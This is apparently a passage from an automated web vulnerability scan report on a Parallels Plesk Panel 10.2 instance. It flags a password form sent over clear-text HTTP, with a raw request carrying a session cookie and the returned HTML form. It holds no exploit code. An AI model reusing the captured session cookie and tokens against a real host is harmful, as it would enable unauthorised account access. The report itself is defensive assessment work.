<div class='field-value'>

<select name="contacts[contactsSection][country]" id="contacts-contactsSection-country">
<option value="AF" label="Afghanistan">Afghanistan</option>
<option value="AX" label="..land Islands">..land Islands</option>
<option value="AL" label="Albania">Albania</option>
<option value="DZ" label="Algeria">Algeria</option>
<option value="AS" label="American Samoa">American Samoa</option>
<option value="AD" label="Andorra">Andorra</option>
<option value="AO" label="Angola">Angola</option>
<option value="AI" label="Anguilla">Anguilla</option>
<option value="AQ" label="Antarctica">Antarctica</option>
<option value="AG" label="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="AR" label="Argentina">Argentina</option>
<option value="AM" label="Armenia">Armenia</option>
<option value="AW" label="Aruba">Aruba</option>
<option value="AU" label="Australia">Australia</option>
<option value="AT" label="Austria">Austria</option>
<option value="AZ" label="Azerbaijan">Azerbaijan</option>
<option value="BS" label="Bahamas">Bahamas</option>
<option value="BH" label="Bahrain">Bahrain</option>
<option value="BD" label="Bangladesh">Bangladesh</option>
<option value="BB" label="Barbados">Barbados</option>
<option value="BY" label="Belarus">Belarus</option>
<option value="BE" label="Belgium">Belgium</option>
<option value="BZ" label="Belize">Belize</option>
<option value="BJ" label="Benin">Benin</option>
<option value="BM" label="Bermuda">Bermuda</option>
<option value="BT" label="Bhutan">Bhutan</option>
<option value="BO" label="Bolivia, Plurinational State of">Bolivia, Plurinational State of</option>
<option value="BA" label="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="BW" label="Botswana">Botswana</option>
<option value="BV" label="Bouvet Island">Bouvet Island</option>
<option value="BR" label="Brazil">Brazil</option>
<option value="IO" label="British Indian Ocean Territory">British Indian Ocean Territory</option>
<option value="BN" label="Brunei Darussalam">Brunei Darussalam</option>
<option value="BG" label="Bulgaria">Bulgaria</option>
<option value="BF" label="Burkina Faso">Burkina Faso</option>
<option value="BI" label="Burundi">Burundi</option>
<option value="KH" label="Cambodia">Cambodia</option>
<option value="CM" label="Cameroon">Cameroon</option>
<option value="CA" label="Canada">Canada</option>
<option value="CV" label="Cape Verde">Cape Verde</option>
<option value="KY" label="Cayman Islands">Cayman Islands</option>
<option value="CF" label="Central African Republic">Central African Republic</option>
<option value="TD" label="Chad">Chad</option>
<option value="CL" label="Chile">Chile</option>
<option value="CN" label="China">China</option>
<option value="CX" label="Christmas Island">Christmas Island</option>
<option value="CC" label="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
<option value="CO" label="Colombia">Colombia</option>
<option value="KM" label="Comoros">Comoros</option>
<option value="CG" label="Congo">Congo</option>
<option value="CD" label="Congo, the Democratic Republic of the">Congo, the Democratic Republic of the</option>
<option value="CK" label="Cook Islands">Cook Islands</option>
<option value="CR" label="Costa Rica">Costa Rica</option>
<option value="CI" label="Cote D'Ivoire">Cote D'Ivoire</option>
<option value="HR" label="Croatia">Croatia</option>
<option value="CU" label="Cuba">Cuba</option>
<option value="CY" label="Cyprus">Cyprus</option>
<option value="CZ" label="Czech Republic">Czech Republic</option>
<option value="DK" label="Denmark">Denmark</option>
<option value="DJ" label="Djibouti">Djibouti</option>
<option value="DM" label="Dominica">Dominica</option>
<option value="DO" label="Dominican Republic">Dominican Republic</option>
<option value="EC" label="Ecuador">Ecuador</option>
<option value="EG" label="Egypt">Egypt</option>
<option value="SV" label="El Salvador">El Salvador</option>
<option value="GQ" label="Equatorial Guinea">Equatorial Guinea</option>
<option value="ER" label="Eritrea">Eritrea</option>
<option value="EE" label="Estonia">Estonia</option>
<option value="ET" label="Ethiopia">Ethiopia</option>
<option value="FK" label="Falkland Islands (Malvinas)">Falkland Islands (Malvinas)</option>
<option value="FO" label="Faroe Islands">Faroe Islands</option>
<option value="FJ" label="Fiji">Fiji</option>
<option value="FI" label="Finland">Finland</option>
<option value="FR" label="France">France</option>
<option value="GF" label="French Guiana">French Guiana</option>
<option value="PF" label="French Polynesia">French Polynesia</option>
<option value="TF" label="French Southern Territories">French Southern Territories</option>
<option value="GA" label="Gabon">Gabon</option>
<option value="GM" label="Gambia">Gambia</option>
<option value="GE" label="Georgia">Georgia</option>
<option value="DE" label="Germany">Germany</option>
<option value="GH" label="Ghana">Ghana</option>
<option value="GI" label="Gibraltar">Gibraltar</option>
<option value="GR" label="Greece">Greece</option>
<option value="GL" label="Greenland">Greenland</option>
<option value="GD" label="Grenada">Grenada</option>
<option value="GP" label="Guadeloupe">Guadeloupe</option>
<option value="GU" label="Guam">Guam</option>
<option value="GT" label="Guatemala">Guatemala</option>
<option value="GG" label="Guernsey">Guernsey</option>
<option value="GN" label="Guinea">Guinea</option>
<option value="GW" label="Guinea-Bissau">Guinea-Bissau</option>
<option value="GY" label="Guyana">Guyana</option>
<option value="HT" label="Haiti">Haiti</option>
<option value="HM" label="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option>
<option value="VA" label="Holy See (Vatican City State)">Holy See (Vatican City State)</option>
<option value="HN" label="Honduras">Honduras</option>
<option value="HK" label="Hong Kong">Hong Kong</option>
<option value="HU" label="Hungary">Hungary</option>
<option value="IS" label="Iceland">Iceland</option>
<option value="IN" label="India">India</option>
<option value="ID" label="Indonesia">Indonesia</option>
<option value="IR" label="Iran, Islamic Republic of">Iran, Islamic Republic of</option>
<option value="IQ" label="Iraq">Iraq</option>
<option value="IE" label="Ireland">Ireland</option>
<option value="IM" label="Isle of Man">Isle of Man</option>
<option value="IL" label="Israel">Israel</option>
<option value="IT" label="Italy">Italy</option>
<option value="JM" label="Jamaica">Jamaica</option>
<option value="JP" label="Japan">Japan</option>
<option value="JE" label="Jersey">Jersey</option>
<option value="JO" label="Jordan">Jordan</option>
<option value="KZ" label="Kazakhstan">Kazakhstan</option>
<option value="KE" label="Kenya">Kenya</option>
<option value="KI" label="Kiribati">Kiribati</option>
<option value="KP" label="Korea, Democratic People's Republic of">Korea, Democratic People's Republic of</option>
<option value="KR" label="Korea, Republic of">Korea, Republic of</option>
<option value="KW" label="Kuwait">Kuwait</option>
<option value="KG" label="Kyrgyzstan">Kyrgyzstan</option>
<option value="LA" label="Lao People's Democratic Republic">Lao People's Democratic Republic</option>
<option value="LV" label="Latvia">Latvia</option>
<option value="LB" label="Lebanon">Lebanon</option>
<option value="LS" label="Lesotho">Lesotho</option>
<option value="LR" label="Liberia">Liberia</option>
<option value="LY" label="Libyan Arab Jamahiriya">Libyan Arab Jamahiriya</option>
<option value="LI" label="Liechtenstein">Liechtenstein</option>
<option value="LT" label="Lithuania">Lithuania</option>
<option value="LU" label="Luxembourg">Luxembourg</option>
<option value="MO" label="Macao">Macao</option>
<option value="MK" label="Macedonia, the Former Yugoslav Republic of">Macedonia, the Former Yugoslav Republic of</option>
<option value="MG" label="Madagascar">Madagascar</option>
<option value="MW" label="Malawi">Malawi</option>
<option value="MY" label="Malaysia">Malaysia</option>
<option value="MV" label="Maldives">Maldives</option>
<option value="ML" label="Mali">Mali</option>
<option value="MT" label="Malta">Malta</option>
<option value="MH" label="Marshall Islands">Marshall Islands</option>
<option value="MQ" label="Martinique">Martinique</option>
<option value="MR" label="Mauritania">Mauritania</option>
<option value="MU" label="Mauritius">Mauritius</option>
<option value="YT" label="Mayotte">Mayotte</option>
<option value="MX" label="Mexico">Mexico</option>
<option value="FM" label="Micronesia, Federated States of">Micronesia, Federated States of</option>
<option value="MD" label="Moldova, Republic of">Moldova, Republic of</option>
<option value="MC" label="Monaco">Monaco</option>
<option value="MN" label="Mongolia">Mongolia</option>
<option value="ME" label="Montenegro">Montenegro</option>
<option value="MS" label="Montserrat">Montserrat</option>
<option value="MA" label="Morocco">Morocco</option>
<option value="MZ" label="Mozambique">Mozambique</option>
<option value="MM" label="Myanmar">Myanmar</option>
<option value="NA" label="Namibia">Namibia</option>
<option value="NR" label="Nauru">Nauru</option>
<option value="NP" label="Nepal">Nepal</option>
<option value="NL" label="Netherlands">Netherlands</option>
<option value="AN" label="Netherlands Antilles">Netherlands Antilles</option>
<option value="NC" label="New Caledonia">New Caledonia</option>
<option value="NZ" label="New Zealand">New Zealand</option>
<option value="NI" label="Nicaragua">Nicaragua</option>
<option value="NE" label="Niger">Niger</option>
<option value="NG" label="Nigeria">Nigeria</option>
<option value="NU" label="Niue">Niue</option>
<option value="NF" label="Norfolk Island">Norfolk Island</option>
<option value="MP" label="Northern Mariana Islands">Northern Mariana Islands</option>
<option value="NO" label="Norway">Norway</option>
<option value="OM" label="Oman">Oman</option>
<option value="PK" label="Pakistan">Pakistan</option>
<option value="PW" label="Palau">Palau</option>
<option value="PS" label="Palestinian Territory, Occupied">Palestinian Territory, Occupied</option>
<option value="PA" label="Panama">Panama</option>
<option value="PG" label="Papua New Guinea">Papua New Guinea</option>
<option value="PY" label="Paraguay">Paraguay</option>
<option value="PE" label="Peru">Peru</option>
<option value="PH" label="Philippines">Philippines</option>
<option value="PN" label="Pitcairn">Pitcairn</option>
<option value="PL" label="Poland">Poland</option>
<option value="PT" label="Portugal">Portugal</option>
<option value="PR" label="Puerto Rico">Puerto Rico</option>
<option value="QA" label="Qatar">Qatar</option>
<option value="RE" label="Reunion">Reunion</option>
<option value="RO" label="Romania">Romania</option>
<option value="RU" label="Russian Federation">Russian Federation</option>
<option value="RW" label="Rwanda">Rwanda</option>
<option value="BL" label="Saint Barthelemy">Saint Barthelemy</option>
<option value="SH" label="Saint Helena, Ascension and Tristan da Cunha">Saint Helena, Ascension and Tristan da Cunha</option>
<option value="KN" label="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="LC" label="Saint Lucia">Saint Lucia</option>
<option value="MF" label="Saint Martin">Saint Martin</option>
<option value="PM" label="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option>
<option value="VC" label="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>
<option value="WS" label="Samoa">Samoa</option>
<option value="SM" label="San Marino">San Marino</option>
<option value="ST" label="Sao Tome and Principe">Sao Tome and Principe</option>
<option value="SA" label="Saudi Arabia">Saudi Arabia</option>
<option value="SN" label="Senegal">Senegal</option>
<option value="RS" label="Serbia">Serbia</option>
<option value="SC" label="Seychelles">Seychelles</option>
<option value="SL" label="Sierra Leone">Sierra Leone</option>
<option value="SG" label="Singapore">Singapore</option>
<option value="SK" label="Slovakia">Slovakia</option>
<option value="SI" label="Slovenia">Slovenia</option>
<option value="SB" label="Solomon Islands">Solomon Islands</option>
<option value="SO" label="Somalia">Somalia</option>
<option value="ZA" label="South Africa">South Africa</option>
<option value="GS" label="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option>
<option value="ES" label="Spain">Spain</option>
<option value="LK" label="Sri Lanka">Sri Lanka</option>
<option value="SD" label="Sudan">Sudan</option>
<option value="SR" label="Suriname">Suriname</option>
<option value="SJ" label="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option>
<option value="SZ" label="Swaziland">Swaziland</option>
<option value="SE" label="Sweden">Sweden</option>
<option value="CH" label="Switzerland">Switzerland</option>
<option value="SY" label="Syrian Arab Republic">Syrian Arab Republic</option>
<option value="TW" label="Taiwan">Taiwan</option>
<option value="TJ" label="Tajikistan">Tajikistan</option>
<option value="TZ" label="Tanzania, United Republic of">Tanzania, United Republic of</option>
<option value="TH" label="Thailand">Thailand</option>
<option value="TL" label="Timor-Leste">Timor-Leste</option>
<option value="TG" label="Togo">Togo</option>
<option value="TK" label="Tokelau">Tokelau</option>
<option value="TO" label="Tonga">Tonga</option>
<option value="TT" label="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="TN" label="Tunisia">Tunisia</option>
<option value="TR" label="Turkey">Turkey</option>
<option value="TM" label="Turkmenistan">Turkmenistan</option>
<option value="TC" label="Turks and Caicos Islands">Turks and Caicos Islands</option>
<option value="TV" label="Tuvalu">Tuvalu</option>
<option value="UG" label="Uganda">Uganda</option>
<option value="UA" label="Ukraine">Ukraine</option>
<option value="AE" label="United Arab Emirates">United Arab Emirates</option>
<option value="GB" label="United Kingdom">United Kingdom</option>
<option value="US" label="United States" selected="selected">United States</option>
<option value="UM" label="United States Minor Outlying Islands">United States Minor Outlying Islands</option>
<option value="UY" label="Uruguay">Uruguay</option>
<option value="UZ" label="Uzbekistan">Uzbekistan</option>
<option value="VU" label="Vanuatu">Vanuatu</option>
<option value="VE" label="Venezuela, Bolivarian Republic of">Venezuela, Bolivarian Republic of</option>
<option value="VN" label="Viet Nam">Viet Nam</option>
<option value="VG" label="Virgin Islands, British">Virgin Islands, British</option>
<option value="VI" label="Virgin Islands, U.S.">Virgin Islands, U.S.</option>
<option value="WF" label="Wallis and Futuna">Wallis and Futuna</option>
<option value="EH" label="Western Sahara">Western Sahara</option>
<option value="YE" label="Yemen">Yemen</option>
<option value="ZM" label="Zambia">Zambia</option>
<option value="ZW" label="Zimbabwe">Zimbabwe</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'contacts-contactsSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/user/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="bdaafe67daaa200e2f077bd9577b09f4" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

3.13. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/4  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/edit/id/4

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /smb/user/edit/id/4 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/user/list
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:29:11 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:29:11 GMT
Connection: close
Content-Length: 45522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>format-1 - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Fedit%2Fid%2F4' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/user/list">
<span>Up Level</span>
</a>
</div>
<h2><span><b>format-1</b></span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Smb.UserEditForm = Class.create({

initialize: function(config) {

if (!$('general-account-loginString')) {
return;
}

if ($('general-vcard-email-emailType-internal')) {
$('general-vcard-email-emailType-internal').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-internalEmail')) {
$('general-vcard-email-internalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-internalEmail').observe('change', this._generateLogin.bind(this));
}
if ($('general-vcard-email-domain')) {
$('general-vcard-email-domain').observe('change', this._generateLogin.bind(this));
}

if ($('general-vcard-email-emailType-external')) {
$('general-vcard-email-emailType-external').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-externalEmail')) {
$('general-vcard-email-externalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-externalEmail').observe('change', this._generateLogin.bind(this));
}
},

_generateLogin: function() {
if ($('general-vcard-email-emailType-internal') && $('general-vcard-email-emailType-internal').checked) {
var loginString = $('general-vcard-email-internalEmail').value;
if ('' == loginString) {
//empty username
} else
if ($('general-vcard-email-domain')) {
loginString += '@' + $('general-vcard-email-domain').options[$('general-vcard-email-domain').selectedIndex].text;
} else {
loginString += '@' + $('general-vcard-email-internalEmail-domain').innerHTML;
}
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-emailType-external') && $('general-vcard-email-emailType-external').checked) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-externalEmail')) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
}
}
});

Jsw.onReady(function() {
new Smb.UserEditForm();
});
//]]>
</script><form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Contact Details","tabId":"tab-contacts","containerCls":""}]
});
});
</script>

<div id='tab-general' >

<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>
<div id='general-vcard-contactName-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="general[vcard][contactName]" id="general-vcard-contactName" value="format-1" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address which is also used as a username for logging in to the Panel&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="fdf080d9224fd0d18957a62c" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="fdf080d9224fd0d18957a62c@nosedivesailing.com" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>


<div id='general-vcard-roleId-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-roleId'>User role&nbsp;</label></div>
<div class='field-value'>

<select name="general[vcard][roleId]" id="general-vcard-roleId">
<option value="5" label="Owner">Owner</option>
<option value="6" label="WebMaster">WebMaster</option>
<option value="7" label="Application User" selected="selected">Application User</option>
<option value="8" label="Accountant">Accountant</option>
</select>
<span class='field-errors' style="display:none;"></span>
<span class="hint">User roles grant users administrative privileges and access to applications that you selected for the role.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-loginString'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-loginString'>fdf080d9224fd0d18957a62c@vulnerable.host.fqdn</span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='single-row'>
<div class='indent-box'>

<input type="hidden" name="general[account][isActive]" value="0" /><input type="checkbox" name="general[account][isActive]" id="general-account-isActive" value="1" checked="checked" class="checkbox" />
<div class='indent-box-content'>
<label for='general-account-isActive'>User is active&nbsp;</label>
<span class="hint">Active users can access the Panel.</span>
</div>
</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>
</div>
<div id='tab-contacts' style="display: none;">

<div id='contacts-contactsSection' class='form-box' >
<div id='contacts-contactsSection-content-area'>
<div id='contacts-contactsSection-companyName-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-companyName'>Company name&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][companyName]" id="contacts-contactsSection-companyName" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-phone-form-row' class='form-row' >
